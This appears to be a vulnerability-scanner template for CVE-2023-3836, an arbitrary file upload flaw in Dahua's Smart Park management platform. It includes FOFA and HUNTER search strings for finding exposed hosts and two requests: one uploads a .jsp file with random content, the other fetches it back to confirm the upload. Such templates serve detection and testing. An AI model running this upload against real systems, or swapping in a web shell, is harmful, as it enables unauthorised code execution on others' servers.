id: CVE-2023-3836

info:
  name: Dahua Smart Park Management - Arbitrary File Upload
  author: HuTa0
  severity: high
  verified: true
  description: |
    Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
    HUNTER: web.body="/WPMS/asset/lib/gridster/"
    FOFA: body="/WPMS/asset/lib/gridster/"
  reference:
    - https://mp.weixin.qq.com/s/bDOXB1kzaaRouxOcU5CJnA
    - https://github.com/qiuhuihk/cve/blob/main/upload.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
  tags: cve,cve2023,dahua,fileupload,intrusive,rce
  created: 2023/06/14

set:
  randstr: randomLowercase(20)
  randbody: randomLowercase(32)
  rboundary: randomLowercase(8)
rules:
  r0:
    request: 
      method: POST
      path: /emap/devicePoint_addImgIco?hasSubsystem=true
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
          ------WebKitFormBoundary{{rboundary}}\r\n\
          Content-Disposition: form-data; name=\"upload\";filename=\"{{randstr}}.jsp\"\r\n\
          Content-Type: application/octet-stream\r\n\
          Content-Transfer-Encoding: binary\r\n\
          \r\n\
          {{randbody}}\r\n\
          ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":')
    output:
      search: '"\"code\":1,\"data\":\"(?P<filename>.*?)\"".bsubmatch(response.body)'
      filename: search["filename"]
  r1:
    request:
      method: GET
      path: /upload/emap/society_new/{{filename}}
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()
